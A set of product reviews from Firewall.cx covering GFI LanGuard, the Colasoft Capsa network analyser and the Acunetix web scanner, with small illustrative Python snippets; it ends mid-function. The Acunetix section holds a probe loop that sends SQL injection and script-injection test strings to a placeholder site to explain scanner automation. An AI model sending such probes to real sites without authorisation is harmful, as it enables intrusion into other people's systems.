As usual for GFI we downloaded the fully-functional evaluation copy (124Mb) from its website and received our 30-day trial licence by email shortly afterwards. Permanent licences are reasonably priced and on a sliding scale that gets cheaper the more target IP addresses you want to scan. You can discover all the targets in your enterprise but you can only scan the number you’re licensed for.

Installation is easy. After selecting your language your system is checked to make sure it’s up to the job:

review-gfi-languard-2011-1
The installer will download and install anything you’re missing, but it’s worth noting that if you’re on a secure network with no internet access then you’ll have to obtain those prerequisites yourself.

Once your licence is in place the next important detail is the user account and password LanGuard will use to access and patch your machines. We’d suggest a domain account with administrator privileges to ensure everything runs smoothly across your whole estate. And, as far as installation goes, that’s pretty much it.

Scanning

LanGuard opened automatically after installation and we were delighted to find it already scanning our host machine:

review-gfi-languard-2011-2

The home screen (above) shows just how easy LanGuard is to use. All the real-world tasks you’ll need to do are logically and simply accessible and that’s the case all the way through. Don’t be deceived, though; just because this product is well-designed doesn’t mean it isn’t also well endowed.

Here’s the first treasure – as well as scanning and patching multiple versions of Windows, LanGuard 2011 interfaces with other security-significant programs. Here it is berating us for our archaic versions of Flash Player, Java, QuickTime and Skype:

review-gfi-languard-2011-3

This means you can take, from just one tool, a holistic view of the overall security of your desktop estate rather than just a narrow check of whether or not you have the latest Windows service packs. Anti-virus out of date? LanGuard will tell you. Die-hard user still on an older browser? You’ll know. And you can do something about it.

Remediation

Not only will LanGuard tell you what’s missing, if you click on Remediate down in the bottom right of the screen you can ask the product to go off and fix it. And yes, that includes the Java, antivirus, flash player and everything else:

review-gfi-languard-2011-4

Want to deploy some of the patches but not all? No problem. And would you like it to happen during the dark hours? LanGuard can do that too, automatically waking up the machines, shutting them down again and emailing you with the result. Goodness, we might even start to enjoy our job!

LanGuard can auto-download patches, holding them ready for use like a Windows SUS server, or it can go and get them on demand. We just clicked Remediate and off it went, downloaded our updated Adobe AIR and installed it without any fuss and in just a couple of minutes.

Agents and Reports

Previous versions of LanGuard were ‘agentless’, with the central machine scanning, patching and maintaining your desktop estate over the network. This was fine but it limited the throughput and hence what could be achieved in a night’s work. While you can still use it like this, LanGuard 2011 also introduces a powerful agent-based mode. Install the agent on your PCs (it supports all the current versions of Windows) and they will do the work while your central LanGuard server merely gives the orders and collects the results. The agents give you a lot of power; you can push-install them without having to visit every machine, and even if a laptop strays off the network for a while its agent will report in when it comes back. This is what you’d expect from a scalable, enterprise-credible product and LanGuard delivers it in style.

The reports on offer are comprehensive and nicely presented. Whether you just want a few pie charts to convince your boss of the value of your investment or you need documentary evidence to demonstrate PCI DSS compliance, you’ll find it here:

review-gfi-languard-2011-5

A particularly nice touch is the baseline comparison report; you define one machine as your baseline and LanGuard will then show you how your other PCs compare to it, what’s missing and/or different:

review-gfi-languard-2011-6
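Conceptually, a baseline comparison boils down to a set difference: which items exist on the baseline but not on the target, and vice versa. Here is a toy sketch of the idea; the patch lists are invented for illustration and this is not how LanGuard implements the report:

```python
# Toy baseline comparison: patch identifiers below are made up for illustration.
baseline = {"KB2510531", "KB2518869", "KB2536276"}
target   = {"KB2510531", "KB2536276", "KB2476490"}

missing_from_target = baseline - target   # on the baseline, absent from the target
extra_on_target     = target - baseline   # on the target, absent from the baseline

print("Missing from target:", sorted(missing_from_target))
print("Extra on target:    ", sorted(extra_on_target))
```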

Other Features

What else can this thing do? Well there’s so much it’s hard to pick out the best points without exceeding our word limit, but here are a few of our favourites:

  • A comprehensive hardware audit of all the machines in your estate, updated regularly and automatically, including details of the removable USB devices that have been used
  • An equally comprehensive and automatic software audit, broken down into useful drag-and-drop categories, so you’ll always know exactly who has what installed. And this doesn’t just cover applications but all the stuff like Java, flash, antivirus and antispyware as well
  • The ability to define programs and applications as unauthorised, which in turn allows LanGuard to tell you where they are installed, alert you if they get installed and – oh joy – automatically remove them from users’ machines
  • System reports including things like the Windows version, shared drives, processes, services and local users and groups including who logged on and when
  • Vulnerability reports ranging from basic details like open network ports to detected vulnerabilities with their corresponding OVAL and CVE references and hyperlinks for further information
  • A page of useful tools including SNMP walk, DNS lookup and enumeration utilities

Conclusion

We really liked this product. If you have a shop full of Windows desktops to support and you want complete visibility and control over all aspects of their security from just one tool then LanGuard 2011 is well worth a look. The real-world benefits of a tool like this are undeniable, but the beauty of LanGuard 2011 is in the way those benefits are delivered. GFI has drawn together all the elements of this complicated and important task into one seamless, intuitive and comprehensive whole and left nothing out, which is why we’ve given LanGuard 2011 the coveted Firewall.cx 10/10 award.

 


GFI Languard Network Security Scanner V9 Review

With Version 9, GFI's Network Security Scanner has finally come of age. GFI has focussed the product on its core benefit – maintaining the security of the Windows enterprise – and the result is a powerful application that offers real benefits for the time-pressed network administrator.

Keeping abreast of the latest Microsoft patches and Service Packs, regular vulnerability scanning, corrective actions, software audit and enforcement in a challenging environment can really soak up your time. Not any more though – install Network Security Scanner and you can sit back while all this and more happens automatically across your entire estate.

The user interface for Version 9 is excellent; so intuitive in fact that we didn't touch the documentation at all yet still managed to use all of the product's features. Each screen leads you to the next so effectively that you barely need to think about what you are doing and using the product quickly becomes second nature.

Version 8 was good, but with Version 9 GFI has done it again.

Installation

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

The Interface

The separate toolbar scheduler from Version 8 is gone and, in its place, the opening screen gives you all the options you need: Scan this Computer, Scan the Network, Custom Scan or Scheduled Scan. Click ‘Scan this Computer' and the scan begins – just one simple mouse click and you're off.

reviews-gfi-languard-v9-1

Performance and Results

Scanning speed is just as good as Version 8 and in less than two minutes we had a summary of the results:

reviews-gfi-languard-v9-2

Simply look below the results summary and the handy Next Steps box (with amusing typographical error) leads you through the process of dealing with them.

The prospect of Analizing the results made our eyes water so, having taken care to protect our anatomy from any such unwarranted incursion, we clicked the link:

reviews-gfi-languard-v9-3

The scan results are grouped by category in the left column with details to the right. Expand the categories and you get a wealth of information.

The vulnerabilities themselves are described in detail with reference numbers and URLs to lead you to further resources, but that's not all. You also get the patch status of the scanned system, a list of open ports, a comprehensive hardware report, an inventory of the installed software and a system summary. Think of all this in terms of your enterprise – if you have this product scanning all your machines you can answer questions such as “Which machines are still on Service Pack 2?” or “How much memory is in each of the Sales PCs?” or “What software does Simon have installed on his laptop?” without going anywhere else. It's all there for you at the click of a mouse.

There are other gems here as well, too many to list but here are some of our favourites. Under Potential Vulnerabilities the scanner lists all the USB devices that had been connected so we could monitor the historical use of memory sticks and the like. And the software audit, useful in itself, held another delight. Right click on any software entry and you can tell the scanner to uninstall it, either from just this machine or from all the machines in the network. Go further and define a list of banned applications and the product will remove them for you, automatically, when it runs its regular scan. Imagine the face of that wayward user each morning …

Patch Deployment

Choose the Remediate link and you'll head off to the part of the product that installs patches and service packs. Needless to say, these can be downloaded for you from Microsoft as they are released and held by the product, ready for use:

reviews-gfi-languard-v9-4

You can either let the scanner automatically install whatever patches and service packs it finds missing or you can vet and release patches you want to allow. This will let you block the next release of Internet Explorer, for example, while allowing other critical patches through. You can also uninstall patches and service packs from here.

As in Version 8, you can also deploy custom software to a single machine or across your estate. In a nutshell, if it is executable or can be opened then you can deploy it. As a test we pushed a picture of a pair of cute kittens to a remote machine where the resident graphics program popped open to display them. You can install software just as easily provided the install needs no user intervention:

reviews-gfi-languard-v9-5

reviews-gfi-languard-v9-6

Alerts and Reporting

This is where GFI demonstrates it is serious about positioning this product as a robust and reliable enterprise-ready solution.

Firstly the scanner can email you the results of its nocturnal activities so all you have to do each morning is make yourself a coffee and check your inbox. We'd have liked to see this area expanded, perhaps with definable events that could trigger an SMS message, SNMP trap or a defined executable. Maybe in Version 10?

To convince your manager of the wisdom of your investment there is a good range of coloured charts, and if you have the GFI Report Manager framework the product slots right into it so you can generate detailed custom reports from the back-end database.

reviews-gfi-languard-v9-7

And speaking of the database, GFI has now provided maintenance options so you can schedule backups and perform management tasks from within the scanner itself; a good idea for a key application.

Subscribe to what?

A vulnerability scanner is only any good, of course, if it can be automatically updated with the latest exploits as they come out. GFI has changed the business model with Version 9, so you'll be expected to shell out a modest annual fee for a Software Maintenance Agreement (SMA), unlike Version 8 where you paid in full and updates were free thereafter.

A nag screen reminds you when your subscription runs out so you needn't worry about not noticing:

reviews-gfi-languard-v9-8

Conclusion

What more can we say? If you have an estate of Windows machines to secure and maintain then this is what you have been looking for. It does everything you might need and more, it's easy to use and delivers real-world benefits.


Colasoft Capsa v7.2.1 Network Analyser Review

Using network analysing software, we are able to monitor our network and dig into the various protocols to see what's happening in real time. This can help us better understand the theoretical knowledge we've obtained over the years but, most importantly, it helps us identify, troubleshoot and fix network issues that we wouldn't otherwise be able to resolve.

A quick search on the Internet will reveal many network analysers, making it confusing to select one. Some provide basic functions, such as packet sniffing, making them ideal for simple tasks, while others give you all the tools and functions needed to ensure the job is done the best possible way.

Colasoft's network analyser is a product that falls in the second category. We had the chance to test drive the Colasoft Network Analyser v7.2.1 which is the latest available version at the time of writing.

Having used previous versions of Colasoft's network analyser, we were impressed by this latest version, which promises a lot no matter what the environment demands.

The Software

Colasoft's Capsa network analyser is available as a demo version directly from their website www.colasoft.com. We quickly downloaded the 21.8mb file and began the installation which was a breeze. Being small and compact meant the whole process didn't take more than 30-40 seconds.

We fired up the software, entered our registration details, activated our software and up came the first screen which shows a completely different philosophy to what we have been used to:

reviews-colasoft-1

Before you even start capturing packets and analysing your network, you're greeted with a first screen that allows you to select the network adaptor to be used for the session, while allowing you to choose from a number of preset profiles regarding your network bandwidth (1000, 100, 10 or 2 Mbps).

Next, you can select the type of analysis you need to run for this session ranging from Full analysis, Traffic Monitoring, Security analysis to HTTP, Email, DNS and FTP analysis. The concept of pre-configuring your packet capturing session is revolutionary and very impressive. Once the analysis profile is selected, the appropriate plug-in modules are automatically loaded to provide all necessary information.

For our review, we selected the ‘100Mb Network’ profile and ‘Full Analysis’ profile, providing access to all plug-in modules, which include ARP/RARP, DNS, Email, FTP, HTTP and ICMPv4 – more than enough to get any job done!

Optionally, you can use the ‘Packet Filter Settings’ section to apply filters to the packets that will be captured:

reviews-colasoft-2
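Capsa drives its capture filters entirely through the GUI, but if you want to experiment with the same idea programmatically, here is a minimal sketch using the third-party scapy package with a BPF-style filter; it is unrelated to Capsa and assumes scapy (plus a capture driver such as Npcap on Windows) is installed:

```python
# Minimal capture-filter example using scapy (requires admin/root privileges).
from scapy.all import sniff

# Capture only HTTP traffic (TCP port 80) and stop after 20 packets.
packets = sniff(filter="tcp port 80", count=20)
packets.summary()
```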

The Main Dashboard

As soon as the program loaded its main interface, we were surprised by the wealth of information and options provided.

The interface is broken into four sections: tool bar, node explorer, dashboard and online resource. The node explorer (left lower side) and online resource (right lower side) section can be removed, providing the dashboard with the maximum possible space to view all information related to our session.

reviews-colasoft-3

The menu provided allows the configuration of the program, plus access to four additional tools: Ping, Packet Player, Packet Builder and MAC Scanner.

To uncover the full capabilities of the Colasoft Capsa Network Analyser, we decided to proceed with the review by breaking down each of the four sections.

The ToolBar

The toolbar is populated with a number of options and tools that proved extremely useful and are easily accessible. As shown below, it too is broken into smaller sections, allowing you to control the start/stop function of your capture session, filters and network profile settings, from where you can set your bandwidth, profile name, alarms and much more.

reviews-colasoft-4

The Analysis section is populated with some great features we haven't found in other similar tools. Here, you can enable or disable the built-in ‘diagnosis settings’ for over 35 different protocols and TCP/UDP states.

reviews-colasoft-5

When selecting a diagnosis setting, Colasoft Capsa will automatically explain, in the right window, what the setting shows and the impact on the network. When done, click on the OK button and you're back to the main capturing screen.

The Analysis section also allows you to change the buffer size in case you want to capture packets for an extended period of time and, even better, you can enable the ‘auto packet saving’ feature which will automatically save all captured packets to your hard drive, making them available whenever you need them.

Right next to the Analysis section are the 'Network Utilisation' and 'pps' (packets per second) gauges, followed by the 'Traffic History Chart'. These nifty gauges show you, in near real time, the utilisation of your network card according to the network profile you selected earlier, plus any filters that might have been selected.

For example, if a 100Mbps network profile was selected, the gauges represent the utilisation of a 100Mbps network card. If, in addition, filters were selected, e.g. HTTP, then both gauges represent 100Mbps network utilisation only for the HTTP protocol. So if there were a large email or FTP download it wouldn't register on the gauges, as they only show utilisation for HTTP traffic, according to the filter.

To give the gauges a try, we disabled all filters and started a 1.4Gig file transfer between our test bed and server, over our 100Mbps network. Utilisation hit the red areas while the pps remained at around 13,000 packets per second.

reviews-colasoft-6
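As a rough back-of-the-envelope check of those gauge readings, the numbers stack up; the average frame size used below is our assumption, not a figure reported by Capsa:

```python
# Sanity check of the gauges: 13,000 pps is from our test, the frame size is assumed.
pps = 13_000
avg_frame_bytes = 960      # assumed average frame size during the file transfer
link_mbps = 100            # the '100Mb Network' profile selected earlier

throughput_mbps = pps * avg_frame_bytes * 8 / 1_000_000
utilisation = throughput_mbps / link_mbps * 100
print(f"{throughput_mbps:.1f} Mbps, roughly {utilisation:.0f}% of a {link_mbps} Mbps link")
```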

The gauges are almost realtime as they are updated once every second, though we would have loved to see them swinging left-right in real time. One issue we encountered was that the 'Traffic History Chart' seemed to chop off the bandwidth value when moving our cursor toward the top of the graph. This is evident in our screenshot where the value shown is 80.8Mbps, and makes it almost impossible to use the history chart when your bandwidth is almost 100% utilised. We hope to see this fixed in the next version.

At the very end of the toolbar, the 'Packet Buffer' provides visual feedback on how full the buffer actually is, plus there are a few options to control the packet buffer for that session.

Node Explorer & DashBoard

In the lower left area we find the 'Node Explorer', which works in conjunction with the main dashboard to present the information from our capture session. The Node Explorer is actually a very smart concept as it allows you to instantly filter the captured information.

The Node Explorer starts populating the segmented areas automatically as it captures packets on the network. It provides a nice break-down of the information using a hierarchical approach that also follows the OSI model.

As we noticed, we could choose to select the Physical Explorer that contained nodes with MAC Addresses, or select the IP Explorer to view information about nodes based on their IP Address.

Each of these sections is then further broken down as shown. It is a nice, simple and effective way to categorise the information and help the user find what is needed without searching through all captured packets.

Once we made a selection (Protocol Explorer/Ethernet II/IP (5), as shown below), the dashboard next to it provided up to 13 tabs of information, which are analysed below.

reviews-colasoft-7

Selecting the IP node, the Protocol tab in the main dashboard provided a wealth of information and we were quickly able to view the quantity of packets, the type and amount of traffic, and other critical information for the duration of our session.

We identified our Cisco Call Manager Express music-on-hold streaming under UDP/SCCP, which consumes almost 88Kbps of bandwidth, an SNMP session which monitors a remote router accounting for 696bps of traffic, and lastly the ICMP tracking of our website, costing us another 1.616Kbps of traffic. All together, 89.512Kbps.

reviews-colasoft-8

This information is automatically updated every second and you can customise the refresh rate from 10 presets. One function we really loved was the fact we could double-click on any of the shown protocols and another window would pop up with all packets captured for the selected protocol.

We double-clicked on the OSPF protocol (second last line in the above screenshot) to view all packets related to that protocol and here is what we got:

reviews-colasoft-9

Clearly there is no need to use filters, as we probably would in other similar types of software, thanks to the smart design of the Node Explorer and Dashboard. Keep in mind that if we need to have all packets saved, we will need an appropriately sized buffer, otherwise the buffer is recycled as expected.

Going back to the main area, any user will realise that the dashboard area is where Colasoft's Capsa truly excels and unleashes its potential. The area is smartly broken into a tabbed interface and each tab does its own magic:

reviews-colasoft-10

The user can quickly switch between any tabs and obtain the information needed without disrupting the flow of packets captured.

Let's take a quick look at what each tab offers:

Summary Tab

The Summary tab is an overview of what the network analyser 'sees' on the network.

reviews-colasoft-11

We get brief statistics on the total amount of traffic we've seen, regardless of whether it’s been captured or not, the current network utilisation, bits per second and packets per second, plus a breakdown of the packet sizes we've seen so far. Handy information if you want to optimise your network according to your network packet size distribution.

Diagnosis Tab

The Diagnosis tab is truly a goldmine. Here you'll see all the information relating to problems automatically detected by Colasoft Capsa, with no additional effort!

This amazing section is broken up into the Application layer, Transport layer and Network layer (not shown). Capsa will break down each layer in a readable manner and show all related issues it has detected.

reviews-colasoft-12

Once a selection has been made - in our example we chose 'Application layer / DNS Server Slow Response' - the lower area of the window brings up a summary of all the packets in which this issue was detected.

Any engineer who spends hours trying to troubleshoot network issues will truly understand the power and usefulness of this feature.

Protocol Tab

The Protocol tab provides an overview and break-down of the IP protocols on the network, along with other useful information as shown previously in conjunction with the Node Explorer.

reviews-colasoft-13

Physical Endpoint Tab

The Physical Endpoint tab shows conversations from physical nodes (MAC addresses). Each node expands to reveal its IP address, helping you track the traffic. Similar traffic statistics are also shown:

reviews-colasoft-14

As with previous tabs, when selecting a node the physical conversation window opens right below and shows the relevant conversations along with their duration and total traffic.

IP Endpoint Tab

The IP Endpoint tab offers similar information but on the IP Layer. It shows all local and Internet IP addresses captured along with statistics such as number of packets, total bytes received, packets per second and more.

reviews-colasoft-15

When selecting an IP Address, Capsa will show all IP, TCP and UDP conversations captured for this host.

IP Conversation Tab

The IP Conversation tab will be useful to many engineers. It allows the tracking of conversations between endpoints on your network, assuming all traffic passes through the workstation where the Capsa Network Analyser is installed.

The tab will show individual sessions between endpoints, duration, bytes in and out from each end plus a lot more.

reviews-colasoft-16

Network engineers can use this area to troubleshoot problematic sessions between workstations, servers and connections toward the Internet. Clicking on a specific conversation will show all TCP and UDP conversations between the hosts, allowing further analysis.

Matrix Tab

The Matrix tab is an excellent function probably only found on Colasoft's Capsa. The matrix shows a graphical representation of all conversations captured throughout the session. It allows the monitoring of endpoint conversations and will automatically resolve endpoints when possible.

reviews-colasoft-17

Placing the mouse over a string causes Capsa to automatically show all relevant information about conversations between the two hosts. Active conversations are highlighted in green, multicast sessions in red and selected session in orange.

The menu on the left allows more options so an engineer can customise the information.

Packet Tab

The Packet tab gives access to the packets captured on the network. The user can either release the automatic scrolling, so new packets are shown as they are captured, or lock it, so the program keeps capturing without scrolling the packet window. This makes it easy to examine older packets without having to scroll back every time a new packet is captured.

Even though the refresh time is customisable, the fastest refresh rate was only every 1 second. We would prefer a 'realtime' refresh rate and hope to see this implemented in the next update.

reviews-colasoft-18

Log Tab

The Log tab offers information on sessions related to specific protocols such as DNS, Email, FTP and HTTP. It's a good option to have, but we found little value in it since all other features of the program fully cover the information provided by the Log tab.

reviews-colasoft-19

 

Report Tab

The report tab is yet another useful feature of Colasoft's Capsa. It will allow the generation of a network report with all the captured packets and can be customised to a good extent. The program allows the engineer to insert a company logo and name, plus customise a few more fields.

The report offers quite a few options, the most important being the Diagnosis and Protocol statistics.

reviews-colasoft-20

Finally, the report can be exported to PDF or HTML format to distribute it accordingly.

Professionals can use this report to provide evidence of their findings to their customers, making the job look more professional and saving hours of work.

Online Resource

The 'Online Resource' section is a great resource to help the engineer get the most out of the program. It contains links and live demos that show how to detect ARP poisoning attacks, ARP Flooding, how to monitor network traffic efficiently, track down BitTorrents and much more.

Once the user becomes familiar with the software they can choose to close this section, freeing up its space for the rest of the program.

Final Conclusion

Colasoft's Capsa Network Analyser is without doubt a goldmine. It offers numerous enhancements that make it pleasant to work with and easy for anyone to find the information they need. Its unique functions such as the Diagnosis, Matrix and Reports surely make it stand out and can be invaluable for anyone troubleshooting network errors.

While the program is outstanding, it could do with some minor enhancements such as the real-time presentation of packets, more thorough network reports and improvements to the traffic history chart. Future updates will also need to include a 10Gbit option amongst the available network profiles.

We would definitely advise any network administrator or engineer to give it a try and see for themselves how great a tool like Capsa can be.


GFI Languard Network Security Scanner V8

Can something really good get better? That was the question that faced us when we were assigned to review GFI's Languard Network Security Scanner, Version 8 , already well loved (and glowingly reviewed) at Version 5.

All vulnerability scanners for Windows environments fulfil the same basic function, but as the old saying goes “It's not what you do; it's the way that you do it”. GFI have kept all the good points from their previous releases and built on them, and the result is a tool that does everything you would want, with an excellent user interface that is both task-efficient and a real pleasure to use.

Installation

Visit GFI's website and you can download a fully-functional version that you can try before you buy; for ten days if you prefer to remain anonymous or for thirty days if you swap your details for an evaluation code. The download is 32Mb expanding to 125Mb on your disk when installed.

Installation is straightforward. All the software needs is an account to run under, details of its back-end database and a location to reside. MS Access, MSDE or MS SQL Server databases are supported and you can even migrate your data from one to another if needs be.

First of all, if you have a license key you can enter it during installation to save time later – just a little thing, but it shows this software has been designed in a very logical manner.

You're then asked for an account to run the Attendant service, the first of the Version 8 enhancements. This, as its name suggests, is a Windows service that sits in your system tray and allows you easy access to the program and its documentation plus a handy window that lets you see everything the scanner is doing as it works away in the background.

reviews-gfi-languard-v8-1

After this you're asked whether you'd like your scan results stored in Microsoft Access or SQL Server (2000 or higher). This is another nice feature, particularly if you're using the tool to audit, patch and secure an entire infrastructure.

One feature we really liked is the ability to run unattended scheduled scans and email the results. This is a feature you won't find in any other similar product.

GFI's LANguard scanner doesn't just find vulnerabilities, it will also download the updates that fix them and patch your machines for you.

Finally, you can tell the software where to install itself and sit back while the installation completes.

Getting Started

Each time you start the scanner it checks with GFI for more recent versions and for updated vulnerabilities and patches. You can turn this off if you don't always have internet access.

You'll also get a wizard to walk you through the most common scanning tasks. This is great for new users and again you can turn it off once you become familiar with the product.

reviews-gfi-languard-v8-2

The Interface

Everything takes place in one uncluttered main screen as shown below. As our first review task we closed the wizard and simply ‘had a go' without having read a single line of documentation. It's a testament to the good design of the interface that within a few mouse clicks we were scanning our first test system without any problems.

reviews-gfi-languard-v8-3

The left hand pane contains the tools, menus and options available to you. This is split over three tabs, an improvement over Version 5 where everything sat in one huge list. To the right of this are two panes that display the information or settings relating to the option you've chosen, and the results the product has obtained. Below them is a results pane that shows what the scanner is up to, tabbed again to let you view the three scanner threads or the overall network discovery.

Performance and Results

It's fast. While performance obviously depends on your system and network we were pleasantly surprised by the efficiency and speed of the scan.

Speed is nothing without results, however, and the product doesn't disappoint. Results are logically presented as an expanding tree beneath an entry for each scanned machine. Select one of the areas in the left pane and you'll get the detail in the right pane. Right-click there and you can take appropriate action; in the example shown, right-clicking will attempt a connection on that port:

reviews-gfi-languard-v8-4

Vulnerabilities are similarly presented with rich and helpful descriptions, while references for further information from Microsoft and others plus the ability to deploy the relevant patches are just a right-click away:

reviews-gfi-languard-v8-5

The scanner is also surprisingly resilient. We decided to be mean and ran a scan of a desktop PC on a large network – via a VPN tunnel within a VPN tunnel across the public internet with an 11Mb/s wireless LAN connection on the other end. The scan took about ten minutes but completed fine.

Patch Deployment

Finding vulnerabilities is only half the story; this product will also help you fix them. One click at the machine level of the scan results opens yet another helpful screen that gathers all your options in one place. You can elect to remotely patch the errant machine, shut it down or even berate the operator, and a particularly nice touch is the list of your top five most pressing problems:

reviews-gfi-languard-v8-6

Patch deployment is similarly intuitive. The product can download the required patches for you, either now or at a scheduled time, and can access files already downloaded by a WSUS server if you have one. Once you have the files available you can patch now or schedule the deployment, and either way installation is automatic.

Alongside this is another Version 8 feature which gives you access to the same mechanism to deploy and install software of your choice. We tested this by push-installing some freeware tools, but all you need is a fully scripted install for unattended installation and you can deploy anything you like out to your remote machines. This is where the Attendant Service comes in again as the tray application provides a neat log of what's scheduled and what's happened. The example shows how good the error reporting is (we deliberately supplied the wrong credentials):

reviews-gfi-languard-v8-7

This powerful feature is also remarkably configurable – you can specify where the copied files should go, check the OS before installation, change the user credentials (important for file system access and for push-installing the Patch Agent service), reboot afterwards or even seek user approval before going ahead. We've used other tools before for software deployment and we felt right at home with the facilities here.

Scripting and Tools

Another plus for the busy administrator is the facility to schedule scans to run when you'd rather be away doing something else. You can schedule a simple timed scan and have the results emailed to you, or you can set up repeating scans and have the product compare the current results with the previous and only alert you if something has changed. If you don't want your inbox battered you can sleep soundly knowing you can still consult the database next morning to review the results. And if you have mobile users your group scan (or patch) jobs can stay active until your last elusive road warrior has appeared on the network and been processed. Resistance is futile!
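
The diff-and-alert pattern the scheduler automates here is easy to picture. Below is a minimal sketch in plain Python – not LANguard's own scripting interface, and the result files and mail server names are purely hypothetical – showing the idea of comparing the current run against the previous one and only sending mail when something has changed:

import json
import smtplib
from email.message import EmailMessage

# Hypothetical result files, one per scan run, in the form {"host": [open_ports]}.
PREVIOUS_RESULTS = "scan_previous.json"
CURRENT_RESULTS = "scan_current.json"

def load_results(path):
    with open(path) as handle:
        return json.load(handle)

def main():
    old = load_results(PREVIOUS_RESULTS)
    new = load_results(CURRENT_RESULTS)

    # Work out which hosts changed since the last run.
    changes = {}
    for host, ports in new.items():
        if set(ports) != set(old.get(host, [])):
            changes[host] = sorted(set(ports) ^ set(old.get(host, [])))

    if not changes:
        return  # nothing changed - keep the inbox quiet

    message = EmailMessage()
    message["Subject"] = "Scan results changed since last run"
    message["From"] = "scanner@example.com"
    message["To"] = "admin@example.com"
    message.set_content("\n".join(f"{host}: ports {ports}" for host, ports in changes.items()))

    with smtplib.SMTP("mail.example.com") as smtp:  # hypothetical internal mail relay
        smtp.send_message(message)

if __name__ == "__main__":
    main()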

Under the Tools tab there are a few more goodies including an SNMP audit to find insecure community strings. This was the site of our only disappointment with the product – we would have liked the ability to write our own tools and add them in here, but it seemed we'd finally found something GFI hadn't thought of.

reviews-gfi-languard-v8-8

Having said that, all the other scripting and tweaking facilities you'd expect are there, including a comprehensive command-line interface for both scanning and patch deployment and the ability to write custom vulnerability definitions in VBScript. All this and more is adequately documented in the well-written on-line help and user manual, and if you're still stuck there's a link to GFI's knowledgebase from within the program itself.

Summary

We were really impressed by this product. GFI have done an excellent job here and produced a great tool which combines vulnerability scanning and patch management with heavyweight features and an excellent user interface that is a joy to work with.


Acunetix Web Vulnerability Scanner

The biggest problem with testing web applications is scalability. With the addition of even a single form or page to test, you invariably increase the number of repetitive tasks you have to perform and the number of relationships you have to analyze to figure out whether you can identify a security issue.

As such, performing a security assessment without automation is an exercise in stupidity. One can use the lofty argument of the individual skill of the tester, and this is not to be discounted – I'll come back to it – but, essentially, you can automate at least 80% of the task of assessing website security. This is part of the reason that security testing is becoming highly commoditized: the more you have to scan, the more repetitive tasks you have to perform. It is virtually impossible for a tester to manually analyze each and every variable that needs to be tested. Even if it were possible, performing this iterative assessment manually would be foolishly time-consuming.
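
To put a figure like 80% in perspective, consider what even a trivial probe loop looks like. The sketch below is plain Python using the requests library – the target URL, parameters and payloads are purely illustrative, and a real scanner applies far more sophisticated checks – but multiply this loop by hundreds of parameters and dozens of payload classes and the case for automation makes itself:

import requests

# Illustrative target, parameters and payloads only - a real scan covers far more.
TARGET = "http://testsite.example.com/search"
PARAMETERS = ["q", "page", "sort"]
PAYLOADS = ["'", "\"", "<script>alert(1)</script>", "1 OR 1=1"]

findings = []
for parameter in PARAMETERS:
    for payload in PAYLOADS:
        response = requests.get(TARGET, params={parameter: payload}, timeout=10)
        # Crude checks for demonstration; real scanners use much smarter signatures.
        if "sql syntax" in response.text.lower() or payload in response.text:
            findings.append((parameter, payload, response.status_code))

for parameter, payload, status in findings:
    print(f"Possible issue: parameter={parameter} payload={payload!r} status={status}")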

This problem, coupled with the explosive growth of web applications for business-critical functions, has resulted in a large array of web application security testing products. How do you choose a product that is accurate (false positives are a key concern), safe (we're testing important apps), fast (which comes back to the complexity point) and, perhaps most importantly, meaningful in its analysis?

This implies that its description of the vulnerabilities discovered, and the measures to be taken to mitigate them, must be crystal clear. This is essentially what you're paying for: it doesn't matter how good the scanning engine is or how detailed the threat database is if the output – risk description and mitigation – is not properly handled. With these points in mind, we at Firewall.cx decided to take Acunetix's Web Vulnerability Scanner for a spin.

I’ve had the pleasure of watching the evolution of web scanning tools, right from my own early scripting in PERL, to the days of Nikto and libwhisker, to application proxies, protocol fuzzers and the like. At the outset, let me say that Acunetix’s product has been built by people who have understood this evolution. The designers of the product have been around the block and know exactly what a professional security tester needs in a tool like this. While this puppy will do point ’n’ shoot scanning with a wizard for newbies, it has all the little things that make it a perfect assistant to the manual tester.

A simple example of ‘the small stuff’ is the extremely handy encoder tool that can handle text conversions and hashing in a jiffy. Anyone who’s had the displeasure of having to whip up a base-64 decoder or resort to md5sum to obtain a hash in the middle of a test will appreciate why this is so useful. More importantly, it shows that the folks at Acunetix know that a good tester will be analyzing the results and tweaking the inputs away from what the scanning engine would do. Essentially they give you the leeway to plug your own intellect into the tool.
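
For anyone wondering what the encoder saves you from, the do-it-yourself alternative is a few lines of Python – perfectly doable, just not something you want to be improvising in the middle of a test. A quick sketch (the sample values are made up):

import base64
import hashlib

# A Base64 value lifted from an intercepted request (made-up sample data).
token = "dXNlcjpwYXNzd29yZA=="
print(base64.b64decode(token).decode())           # -> user:password

# An MD5 hash of a candidate string, for comparing against a captured hash.
print(hashlib.md5("SuperSecret1".encode()).hexdigest())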

Usage is extremely straightforward: hit the icon and you'll get a quick-loading interface that looks professional and displays information smartly (I appreciate the tabbed interfaces; these things matter, as a badly designed UI can overwhelm you with more information than you need). Here's a shot of the target selection wizard:

reviews-acunetix-1

What I liked here was the ‘Optimize for the following technologies’ setup. Acunetix did a quick query of my target (our website, www.Firewall.cx) and identified PHP, mod_ssl, OpenSSL and FrontPage as modules that we’re using. When you’re going up against a blind target in a penetration test or setting up scans for 50 webapps at a time, this is something that you will really appreciate.

Next we come to the profile selection, which allows you to choose the scanning profile. Say I just want to look for SQL injection: I can pick that profile. You can use the profile editor to customize and choose your own checks. Standard stuff here. The profile and threat selection GUI is well categorized and it's easy to find the checks you want to select or deselect.

reviews-acunetix-2

You can browse the threat database in detail as shown below:

reviews-acunetix-3

At around this juncture, the tool identified that www.Firewall.cx uses non-standard (non-404) error pages. This is extremely important for the tool to do. If it cannot determine the correct ‘page not found’ page, it will start throwing false positives on every single 302 redirect. This is a major problem with scanners such as Nikto and is not to be overlooked. Acunetix walked me through the identification of a valid 404 page. Perhaps a slightly more detailed explanation as to why this is important would benefit a newbie.
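
For the newbie in question, the underlying trick is simple enough to sketch. The snippet below is plain Python with the requests library – illustrative only, and certainly not Acunetix's actual logic – showing how a scanner can fingerprint a custom 'not found' page so later responses are compared against it rather than trusting status codes alone:

import uuid
import requests

BASE_URL = "http://www.example.com"  # illustrative target

# Request a page that almost certainly does not exist and remember what comes back.
probe = requests.get(f"{BASE_URL}/{uuid.uuid4().hex}.html", timeout=10)
custom_not_found = probe.text if probe.status_code != 404 else None

def page_exists(path):
    response = requests.get(f"{BASE_URL}{path}", timeout=10)
    if response.status_code == 404:
        return False
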